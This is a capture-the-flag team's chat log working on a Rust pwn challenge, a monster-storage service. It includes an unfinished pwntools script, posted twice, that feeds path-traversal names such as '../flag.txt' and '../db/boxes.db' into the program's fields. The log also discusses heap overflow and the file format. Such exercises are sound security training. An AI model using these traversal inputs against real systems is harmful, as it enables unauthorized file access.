Project Sekai - ✅-pwn-bills-blazingly-fast-memory-safe-pocket-monster-storage-system

Bill's Blazingly Fast Memory Safe Pocket Monster Storage System - 500 points

Category: Pwn Description: Bill developed a new PC to store his Pocket Monsters™ in this newfangled blazing fast language! It doesn't even have any unsafe code! Author: Triacontakai nc 0.cloud.chals.io 26780 Files:

https://umdctf.io/files/2b0334f8187c560ffbd36d36873c305d/dist.zip?token=eyJ1c2VyX2lkIjoxNDcsInRlYW1faWQiOjY4LCJmaWxlX2lkIjo2OX0.ZEyIAg.aluLEOCJY1w8K24s_JauXptfBF4

Tags: No tags.

Sutx pinned a message to this channel. 04/28/2023 7:59 PM

@fleming wants to collaborate

@Violin wants to collaborate

@Zafirr wants to collaborate

long rust code

23:32

tria i dont wanna do this

@Johnathan Huu Tri wants to collaborate

I can see path traversal only

maybe it's heap overflow

05:37

I got error when reading from db

it helps me input the string ../flag.txt to the db

08:01

#!/usr/bin/python3

from pwn import *

exe = ELF('bbfmspmss', checksec=False)
context.binary = exe

def create(name):
    sla(b'> ', b'1')
    sla(b'Name: ', name)

def delete(name):
    sla(b'> ', b'2')
    sla(b'Name: ', name)

def list_box():
    sla(b'> ', b'3')

def deposit(name, slot, num, nickname):
    sla(b'> ', b'4')
    sla(b'Name: ', name)
    sla(b'Slot: ', str(slot).encode())
    sla(b'Number: ', str(num).encode())
    sla(b'Nickname: ', nickname)

# def withdraw()

def quit():
    sla(b'> ', b'6')

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)

if args.REMOTE:
    p = remote('')
else:
    p = process(exe.path)

delete(b'../db/boxes.db')
create(b'../db/boxes.db')

deposit(b'../db/boxes.db', 0, 0x1, b'../flag.txt')
deposit(b'../db/boxes.db', 1, 0, b'\0')
quit()

if args.REMOTE:
    p = remote('')
else:
    p = process(exe.path)
list()
delete(b'../db/boxes.db')

p.interactive()

08:02

but seems useless because all function check for write permission but flag is readonly

08:02

so we cannot do much with the path ../flag.txt in database

Johnathan Huu Tri

I got error when reading from db

so I think doing heap overflow would be the reasonable way

@IceCreamMan wants to collaborate

Johnathan Huu Tri

#!/usr/bin/python3

from pwn import *

exe = ELF('bbfmspmss', checksec=False)
context.binary = exe

def create(name):
    sla(b'> ', b'1')
    sla(b'Name: ', name)

def delete(name):
    sla(b'> ', b'2')
    sla(b'Name: ', name)

def list_box():
    sla(b'> ', b'3')

def deposit(name, slot, num, nickname):
    sla(b'> ', b'4')
    sla(b'Name: ', name)
    sla(b'Slot: ', str(slot).encode())
    sla(b'Number: ', str(num).encode())
    sla(b'Nickname: ', nickname)

# def withdraw()

def quit():
    sla(b'> ', b'6')

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)

if args.REMOTE:
    p = remote('')
else:
    p = process(exe.path)

delete(b'../db/boxes.db')
create(b'../db/boxes.db')

deposit(b'../db/boxes.db', 0, 0x1, b'../flag.txt')
deposit(b'../db/boxes.db', 1, 0, b'\0')
quit()

if args.REMOTE:
    p = remote('')
else:
    p = process(exe.path)
list()
delete(b'../db/boxes.db')

p.interactive()

I asked Tria and this would be the intended way

17:43

the only problem is how to read the file when flag is readonly (edited)

println!("matter_manipulator.so: cannot open shared object file: No such file or directory"); Is this file used anywhere?

18:05

seems like not used, not sure why the line is there

nah it's not (edited)

18:19

I think we can use function list to read the flag

18:21

the format for file boxes.db is

p64(number-of-box) +
p64(len-of-box-name) + boxname + p64(len(slot)) + [p64(slot-number)] + 
p64(len-of-box-name) + boxname + p64(len(slot)) + [p64(slot-number)] + 
p64(len-of-box-name) + boxname + p64(len(slot)) + [p64(slot-number)]...

i think when you use function list to read the flag, it will result in the memory allocation error

18:39

i tried

18:39

unless the flag.txt file is in valid "box" format?

yeah maybe

18:40

but still not sure

@afterworld wants to collaborate

it's just a normal flag (edited)

so the only thing we need is bypass to open the flag

20:38

because flag is readonly

20:38

but the program always check for both read and write permission

@Legoclones wants to collaborate

@Piers wants to collaborate

tria pwn always 0 solve

1

super hard XD

intended prob bruted sth

yeah I think so but the only problem is I still get stuck at how to open a readonly file